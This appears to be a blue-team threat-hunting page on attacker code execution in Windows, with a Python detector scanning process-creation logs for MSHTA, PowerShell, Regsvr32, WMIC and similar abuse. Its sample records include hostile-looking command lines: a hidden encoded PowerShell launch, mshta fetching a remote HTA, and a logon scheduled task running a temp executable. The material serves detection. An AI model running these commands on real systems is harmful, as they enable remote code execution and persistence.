Execution
The adversary is trying to run malicious code
In this category the adversary needs to execute their code, whatever the purpose: a reverse shell, enumeration, privilege escalation, and so on. In this section, though, we are the Hunter (Blue Team) searching for our Prey (Red Team) again: what is left behind, which processes are created on the way to their goal, and what traces tell us they were here. It also helps the Red Team be more OPSEC-safe: from here they can learn what they leave behind and how to avoid it.
We will focus on the common techniques explained in the Offensive section:
    MSHTA
    PowerShell
    RunDLL32
    Scheduled Tasks
    Scripting
    Trusted Developer Utilities
      MSBuild
      Regsvr32
    WinRm
    WMIC
    Etc
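As an added example (not from the original page), the script below shows the kind of hunt this section is about: it scans process-creation telemetry for the execution vehicles listed above and explains why each record stands out. The records are constructed inline and their field names (image, command line, parent image, user) mirror what Sysmon Event ID 1 or Security event 4688 provide; the command-line indicators are heuristics chosen for illustration, not a complete rule set.

```python
"""Hunting for Execution artifacts in process-creation telemetry.

Added example: scans constructed process-creation records for the
execution techniques listed on the page (MSHTA, PowerShell, RunDLL32,
Scheduled Tasks, Scripting, MSBuild, Regsvr32, WinRM, WMIC) and reports
why each hit was flagged. Field names and sample values are assumptions.
"""
import re
from dataclasses import dataclass

# Binaries the page lists as common execution vehicles, keyed by image name.
WATCHED_IMAGES = {
    "mshta.exe": "MSHTA",
    "powershell.exe": "PowerShell",
    "pwsh.exe": "PowerShell",
    "rundll32.exe": "RunDLL32",
    "schtasks.exe": "Scheduled Tasks",
    "cscript.exe": "Scripting",
    "wscript.exe": "Scripting",
    "msbuild.exe": "Trusted Developer Utilities (MSBuild)",
    "regsvr32.exe": "Trusted Developer Utilities (Regsvr32)",
    "winrshost.exe": "WinRM",  # host process for commands arriving over WinRM
    "wmic.exe": "WMIC",
}

# Command-line indicators that raise the severity of a hit:
# (technique, pattern, reason). Heuristics for illustration only.
INDICATORS = [
    ("PowerShell", re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b"), "encoded command"),
    ("PowerShell", re.compile(r"(?i)-(nop|noprofile)\b.*-(w|windowstyle)\s+hidden"), "no profile + hidden window"),
    ("MSHTA", re.compile(r"(?i)https?://"), "remote content"),
    ("Trusted Developer Utilities (Regsvr32)", re.compile(r"(?i)https?://"), "remote content"),
    ("RunDLL32", re.compile(r"(?i)javascript:"), "script protocol handler"),
    ("Scheduled Tasks", re.compile(r"(?i)/create\b"), "new task created"),
    ("WMIC", re.compile(r"(?i)process\s+call\s+create"), "process launch via WMI"),
]

# Parents that rarely have a legitimate reason to spawn these tools.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    user: str


@dataclass
class Hit:
    event: ProcessEvent
    technique: str
    severity: str
    reasons: list


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: ProcessEvent):
    """Return a Hit if the process is a watched execution vehicle, else None."""
    technique = WATCHED_IMAGES.get(basename(event.image))
    if technique is None:
        return None
    reasons = [why for tech, pattern, why in INDICATORS
               if tech == technique and pattern.search(event.command_line)]
    parent = basename(event.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    # A watched binary with no indicators is only worth a baseline note.
    severity = "low" if not reasons else ("high" if len(reasons) > 1 else "medium")
    return Hit(event, technique, severity, reasons)


def hunt(events):
    """Assess every event and keep only the hits, in input order."""
    return [hit for hit in map(assess, events) if hit is not None]


# Constructed sample telemetry (hosts, users and IPs are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QQBBAEEAQQA=",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "LAB\\alice"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://192.0.2.10/update.hta",
                 r"C:\Windows\explorer.exe", "LAB\\alice"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe", "LAB\\alice"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe",
                 r"C:\Windows\explorer.exe", "LAB\\alice"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r"schtasks.exe /create /tn Updater /tr C:\Users\alice\AppData\Local\Temp\u.exe /sc onlogon",
                 r"C:\Windows\System32\cmd.exe", "LAB\\alice"),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic.exe process call create notepad.exe",
                 r"C:\Windows\System32\cmd.exe", "LAB\\bob"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit.severity:6}] {hit.technique}: {hit.event.command_line}")
        for reason in hit.reasons:
            print(f"         - {reason}")
```

In a real hunt the `SAMPLE_EVENTS` list would be replaced by records pulled from Sysmon or Security event logs; the point of the example is that the image name alone only tells you a watched binary ran, and the command line plus parent process is what separates a routine `rundll32.exe` launch from something worth opening a case on.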